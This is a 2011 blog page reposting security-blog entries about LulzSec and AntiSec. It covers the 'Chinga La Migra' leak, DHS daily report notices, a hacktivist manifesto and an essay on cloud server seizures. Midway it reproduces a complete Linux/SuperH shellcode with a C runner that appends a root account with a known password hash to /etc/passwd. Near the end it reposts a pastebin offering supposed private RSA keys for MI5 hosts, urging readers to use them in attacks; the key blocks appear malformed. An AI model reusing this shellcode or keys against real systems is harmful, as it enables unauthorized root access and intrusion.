Friday, June 24, 2011

JadedSecurity #Lulzsec

JadedSecurity

jadedsecurity.net | Jun 23rd 2011

It appears that this may be a homepage or an index page with non-article content. To accurately view it, you may want to switch to the Full Web Page view.

If you know there should be an article here, help improve the article parser by reporting this page. Thanks!

Much Ado about nothing but Information Security

Update: 2:09AM EST.

Got Tossed off of IRC Again…

At around 1am Lulzsecurity.com appears to have gone down again.

@MoooCowMoooCow had just notified me that @anonymoussabu has just gone away and to boot anonops IRC channel had a major disconnect (for me anyway)

Additionally a new blog had been posted highlighting Operation SuperNova

While the site states it is not going to post a mission statement at this time, it does go on to say

“I’d like to let the public know that phase one of OPERATION SUPERNOVA has been successful. Lulzsecurity.com is Tango down at this time. The attack will stop by Midnight PST.”

Will keep you up to date.

Tweet

I will be the first to admit that over the last couple of weeks the laughs have been coming almost non stop by their antics. However, with todays leak “Chinga La Migra” it appears that they have gone too far. The leak consists of documents that could potentially put the lives of law enforcement and confidential informants at risk.

This is just one of the disclaimers that can be seen on the many documents that were released.

The release has information consisting of;

  • Operational Procedures
  • Employment records (Personal Contact information)
  • Informant Information
  • Assignment Rosters
  • Suspect information
  • Crime Scene Photos
  • Witness statements
  • Border patrol assignments
  • And the list goes on.

How many times can we take out Sony, PBS, Fox, etc. while for the most part funny was relatively harmless.  While I never agreed with the release of civilian names, it was about exposing the insecure practices of organizations. As Security Professionals we know once an attacker fixates on a target, it is only a matter of time. So yes, the group had accomplished the media frenzy that most of us had hoped for in order for businesses to wake up and start seriously looking at security.

The whole #AntiSec movement has gotten over the top. They are attacking targets and releasing sensitive data that in some instances that can put peoples lives at risk. I’m all about sticking it to the man as much as the next guy, but this has gone too far.  Law enforcement are just doing there jobs, and do not deserve to be put in the line of fire, just because.

I don’t agree with what the federal government is doing in executing blind sweeps looking for the #AntiSec players either, so it’s not about taking sides. The FBI is using the patriot act as there get out of jail free card, but that’s the administration not the individuals who might be put in harms way through these leaks.

With this latest leak, to me it seems that the days of #AntiSec might be numbered. @th3j35t3r is a key player in the daily DOXing of key members of the group.  As others have pointed out @th3j35t3r is actually beating law enforcement to punch in every single attack. As they have gotten more and more exposure they have also gotten more brazen. After calling out Gawker earlier, they have now provided an interview. I think the end is near….

Tweet

I want to thank @MoooCowMoooCow for pointing this out to me this morning. Apologies for not getting it out sooner.

Pastebin

/*
** Title: Linux/SuperH – sh4 – add root user with password – 143 bytes
** Date: 2011-06-23
** Tested on: debian-sh4 2.6.32-5-sh7751r
** Author: Jonathan Salwan – twitter: @shell_storm
**
** http://shell-storm.org
**
** Informations:
** ————-
** – user: shell-storm
** – pswd: toor
** – uid : 0
**
** open:
** mov #5, r3
** mova @(130, pc), r0
** mov r0, r4
** mov #255, r13
** mov #4, r12
** mul.l r13, r12
** sts macl, r5
** add #69, r5
** mov #84, r13
** mov #5, r12
** mul.l r13, r12
** sts macl, r6
** trapa #2
** mov r0, r11
**
** write:
** xor r6, r6
** xor r5, r5
** mov #4, r3
** mov r11, r4
** mova @(20, pc), r0
** mov r0, r5
** mov #72, r6
** trapa #2
**
** close:
** mov #6, r3
** mov r11, r4
** trapa #2
**
** exit:
** mov #1, r3
** xor r4, r4
** trapa #2
**
** user:
** .string “shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n”
**
** file:
** .string “@@@/etc/passwd”
**
**
** The ‘@@@’ is just for alignment.
**
*/

#include
#include

char *SC =
/* open(“/etc/passwd”, O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
“\x05\xe3\x20\xc7\x03\x64\xff\xed”
“\x04\xec\xd7\x0c\x1a\x05\x45\x75″
“\x54\xed\x05\xec\xd7\x0c\x1a\x06″
“\x02\xc3″

/* r11 = fd */
“\x03\x6b”

/* write(fd, “shell-storm:$1$KQYl/yru$PMt02zUTW”…, 72) */
“\x6a\x26\x5a\x25\x04\xe3\xb3\x64″
“\x04\xc7\x03\x65\x48\xe6\x02\xc3″

/* close(fd) */
“\x06\xe3\xb3\x64\x02\xc3″

/* exit(0) */
“\x01\xe3\x4a\x24\x02\xc3″

/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
“\x73\x68\x65\x6c\x6c\x2d\x73\x74″
“\x6f\x72\x6d\x3a\x24\x31\x24\x4b”
“\x51\x59\x6c\x2f\x79\x72\x75\x24″
“\x50\x4d\x74\x30\x32\x7a\x55\x54″
“\x57\x6d\x4d\x76\x50\x57\x63\x55″
“\x34\x6f\x51\x4c\x73\x2f\x3a\x30″
“\x3a\x30\x3a\x72\x6f\x6f\x74\x3a”
“\x2f\x72\x6f\x6f\x74\x3a\x2f\x62″
“\x69\x6e\x2f\x62\x61\x73\x68\x5c”
“\x6e”

/* @@@/etc/passwd */
“\x40\x40\x40\x2f\x65\x74\x63\x2f”
“\x70\x61\x73\x73\x77\x64″;

int main(void)
{
fprintf(stdout,”Length: %d\n”,strlen(SC));
(*(void(*)()) SC)();
return 0;
}

Tweet

One of the numerous lists I am had provided a link to these interesting daily alerts. I’ll be publishing them Going Forward

Classification: UNCLASSIFIED
—————————————————————————————————–
(U) The DHS Daily Cyber Report for 23 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Daily Terrorism Report for 23 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Daily Human Trafficking and Smuggling Report for 23 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Homeland Security Central Digest for 23 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

DHS Daily Open Source Infrastructure Report June 23, 2011 is attached

Tweet

As seen on their twitter feed. I have confirmed the leak. Below is a sanitized screenshot of the leak

Tweet

UPDATE @KrioXis had sent me a link to his wordpress

@KrioXis has a different goal than what #AntiSec seems to be about. The persona seems to adhere to the reason why security guys love @LulZsec. To Publicly display the false sense of security that governments and corporations have instilled in society. In conversations I have had with him, he has essentially the same ethics as most of us in the security business do. He will not leak confidential information. I for one hope, that his methods will be employed by the rest of the groups. It stops being funny when individuals personal information is exposed.

@KrioXis had forwarded me the PasteBin

|||    | ||||||||   ||||||||||||             ||          ||  |||||||||||| |||||||||
|||   || ||     ||       ||                   ||        ||        ||      ||
|||   || ||     ||       ||      |||||||||||   ||      ||         ||      ||
|||  ||  ||      ||      ||      ||       ||    ||    ||          ||      ||
||| ||   ||      ||      ||      ||2011   ||     ||  ||           ||      ||
|||||    ||     ||       ||      ||   –   ||       ||             ||      |||||||||
||||     ||    ||        ||      ||   Now!||     ||  ||           ||             ||
||||||   ||||||          ||      ||       ||    ||    ||          ||             ||
|||  ||  ||   ||         ||      |||||||||||   ||      ||         ||             ||
|||   || ||    ||        ||                   ||        ||        ||             ||
|||    | ||     ||  ||||||||||||             ||          ||  |||||||||||| |||||||||

+————————+
(             ¦¦¦KRIOXIS¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦         +———–+
¦————-¦¦InjectingToTheHeart¦¦¦¦+———¦YouGotBeef?¦——
)             ¦¦¦¦¦¦¦¦¦SINCE 2011¦¦¦¦¦¦¦         +———–+
+————————+

TWITTER.COM/KRIOXIS
#AntiSec
@LulzSec
@AnonOps

“One mans jailer is another mans freedom fighter.”
After seeing this posted on a website a few days back
some home truths kicked in, and made us wonder…

Why should we be stopped from posting this information?
The “secure” firms you give your information too should
be the ones who the police approach not us.
Even more so after SOME of them “guarantee” your
information “isnt stored”, and if it is
then it is “secure”.
Should they not be approached regarding the DPA?
Who is the real law breaker here…?

As always, the freedom fighters of today are branded as
the bad ones, while money hungry business relish in their
deep deep pockets of money. Why not take out your wallet
and invest in the proper secure systems that you
promise us? we ask you.

So much for customer relations, so much for customer care
if companies really did what they said on the tin groups
like ourselves would never exist. But until the piggys
break the bank, there will be fighters, fighting for
the security we deserve. There is no denying that.

So its down to who has the biggest balls or who
is willing to dig deep to protect their oso valuable
customers. Gain respect for caring about others
and not just yourselves. Who knows, business might
pick up if your showing willingness.

We will continue to contact companies in relations to
database vulnerabilities, but will only try for so long
before forcing their hand to dig deep, very deep.

We inspire to learn, we inspire to show,
We inspire to teach, we inspire to inspire.
Be inspired.

Over&Out
Twitter.com/KrioXis
#Antisec
[End of transmission]…

Tweet

One of the numerous lists I am had provided a link to these interesting daily alerts. I’ll be publishing them Going Forward

Classification: UNCLASSIFIED
—————————————————————————————————–
(U) The DHS Daily Cyber Report for 22 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Daily Terrorism Report for 22 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Daily Human Trafficking and Smuggling Report for 22 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Homeland Security Central Digest for 22 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

DHS Daily Open Source Infrastructure Report June 22, 2011 is attached

Tweet

As much as everybody hates the word, unfortunately we do have to live with it going forward. Those who don’t know what the cloud is aside from vendor fluff can rest assured that the technology has been around forever. The buzzword is actually being used for an old technology, which went by the name of grid computing. Grid Computing was primarily used by Mainframes, however these days we refer to cloud computing as virtual machines. These machines can have data and processing capability spanning multiple physical systems.

I’m not going to go into a discussion on what cloud computing is and what it isn’t, however I was doing some research and I started thinking about the implications of the events today. The FBI according to the NY Times had seized servers, which were related to the attacks. They had also, through the seizure inadvertently seized systems that physically housed applications associated with InstaPaper. While InstaPaper was not involved in any of the attacks, apparently they had shared computing resources. This had brought up an interesting question. If the applications run on shared infrastructure, does law enforcement have the authority to seize them? Could they potentially be violating the rights of application owners who were not attacked? Additionally the rights of customers, who use services on these shared systems.

The Cloud Security Alliance is currently working on building what they refer to as the CloudSirt that would come up with guidance for Incident Response. I have read several articles, including a paper put out by Harvard Law titled “Cloud Computing and National Security Law” and it seems we are pretty much hosed at this moment. An interesting quote from the Harvard piece sums up my concern “Cloud computing has made the very definition of what qualifies as “electronic storage” murky under the Electronic Communications Protection Act (ECPA).”

Electronic storage has historically always been available to law enforcement for the purposes of Forensics. How do you perform a forensic analysis against a storage medium that is constantly growing and shrinking based on use? Storage is now shared as well, by many entities none of which have given up their rights to allow law enforcement to essentially seize their systems. Last but not least are jurisdictional issues on where the sectors that you or your business are using. This is not defined in any type of run book or operating procedure. The system decides where the space is available and uses it as its discretion.

The current direction for investigations appears to be log analysis, the problem with that is that you as a business have essentially outsourced all of your physical architecture. The logs may or may not exist, depending on the verbiage set forth in the contracts with your providers. The “Cloud” and god I hate that word, has brought forth many benefits with one of the greatest being ROI, however with an increase in ROI, the risk tolerance must adjust itself accordingly. It will more than likely come to a point where part of your threat modeling will have to include data leakage through law enforcement activity. This will no doubt under the current regulations be seen as a breach, but I’m sure it will be adjusted in you know whose favor. It will be interesting to see how this plays out, if the attackers are brought to justice.

Tweet

Found on IRC

See Video:

Tweet

Update: This is not the Security Site.

Just caught this on PasteBin, looking through IRC and other sources to check validity

Lovely Lulz Lizards,

In the aftermath of some of our recent attacks, some of our Anti-Sec Antagonists have suggested we’re out of ammunition. To this we extol a hearty Nay! Dear opponents, we’re just getting started! To prove our merciless lulz have naught but a continued stream of added boosts, we present to you the RSA-SSH1 and RSA-SSH2 private keys for some of our favorite targets!

Just cut and paste these into your cannons aimed at the machines below! Don’t forget your lulzy payloadz!

url:pb-01.mi5.co.uk
url:pb-02.mi5.co.uk

—–BEGIN RSA PRIVATE KEY—–

Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,EC69516DB677481CF8EE0D0CBE696CF1
2585YricDk7J6uYAB2Tunc85yduNuE/qXbz1qUUEjOODyO5cnnSdUnTs0XT1DBDs
heFShtokU1soU7AEdExvOKQ56r62THALYyAx5jA76fBayAaTAoNOWLJ6JUsyoHRd
lq1HuxY7osnOUL8jaLjiLHZOINiaTAToVfKrV9E9jHIZOY5roxZeSZS0YH4HTtoD
BYhFCViyvYJgfgRuwJQTqchQWH9ILd+WNaoI1kvASl/k7ci/lAWcri2ylFOnLqWe
g7Y7VvVubjq8T072EyE1RCzOsYtaLSoXErbfOAyD/vvVhuggZ76SwFxKBEwW6yso
1L7a0bfCU5zbxNeuC7ncOF7oKR1bWonele916ZywfyNjcXuT8o/i7FVnXtd+eLk9
7dlOYEyjXThdDoJ6VZ92iyFkzdeR7C779C245qusJUaBtOjfaLX79ZJ7YS2lylba
yuyiyXToYi/gbBQtyHNFQqTCtQVFfW7cxBad7eWxtQukxe2soyIhSqexVJLSTOCg
yQRy6OUyVWRA9e+6+eqDtXwutyD67Jk4KSz9VF1l4jDsng4KbuXU8iNbgLOROSnY
5ovqN9yKbOUf89i00OoWq6uE0SJ1KW4vxNN+QjEQToJFo0Bh8AR/RFeWrF8Wfu7W
jtNJ04cC/wlS9YEDZSacIeYrbdWrKAtirIyjY7oSahcHwhR71gd5ukJdEygQCXxY
7lJsl/c9osnttA7vhntfoWoWy8lr9aVCTAy4a0gVHEkByl9BS81qeWyHYfr7A8hk
5sKIzeVLUtN0QvqVE49KnNK4TbyA10B6dNkjTqQARi/Z9y7fyV1yZeNYrHCyNIfs
k7Sg^FhjuGVRghjO9jbx6GFeom=

—–END RSA PRIVATE KEY—–

—–BEGIN RSA PRIVATE KEY—–

Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE7-CBC,EA9097D0CD142661
47sPPfhx9VCqylt9msMhzqMz7yZYTenACIMihWqdOBSnQtyO/0cEnxQJo9DRy6aY
9cd77RWkWtifpBxOd+4QAyWVmW97qnqlo9xzNYZ4RvKiO8ScLE/jzChY/i+QYB+Q
BFBkIE89MbqVV8JoRnvwsDiRnS7fisRY9yBpNJAcceBDnFLsQqdrfAySwepZ6qOM
Ikhn9qEDyfo6QoNBHR0mD2AZFCXOQMJOaEZcMyj4dtkM9ZhzjYzRnn9db7oISKKm
M9Qsyq89qp7dVB4ZQS7NbA9hRyt78TiTwj+fyvX6wY/fTs0QIWnxq4C4tQASo1wx
bsxkmytkVXN7zjM9aC8SaXnqTpPZAnQaBvqQExzIYaIs7ql7d7IQhhPABBSHVDMv
lYn27yr6oxEp2Psl1ZFtZ7tTW/FWEWpoKHq/Q1DCr7cHllhOYk2pX+xZPd69ElxZ
o4tIfEkqmiRRP6qWQ48qYqphlzIqbeh0zQIZcvBaYRoR1VkoQMrvIanIhttY8XID
qF+rw47jeFY4AzEBwiSQ47YzHPBa2RKDdRaIhfi9yrtTFpOypyO2hY+Q6bKdRBHC
tB+Zd7NXnb6J6vztyQH2ZBKTRF4PO6BkWDPWYrmMQyX6Now10eHkeSAKS2YAook+
th7ywtvDQiqy4W7alI4qP81I8VsOb+sRnMZxEHKsczolyYzwAtZtw1Qj2QfPR0IX
vLjH1qIZ0X0ZwBi1rQKk/4iEFmJjqCslcQbyVnEdf+kRlXY+IBlqhQ8M929amiK7
x/yN0oTQBD2oQfotQOXkq/H9tyyzfE9eYWSrXaqCHIy=

—–END RSA PRIVATE KEY—–

Tweet

  • Support The Site

Original Page: http://www.jadedsecurity.com/

Shared from Read It Later

Elyssa Durant, Ed.M. 

United States of America 

Forgive typos! iBLAME iPhone

Posted via email from Whistleblower

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)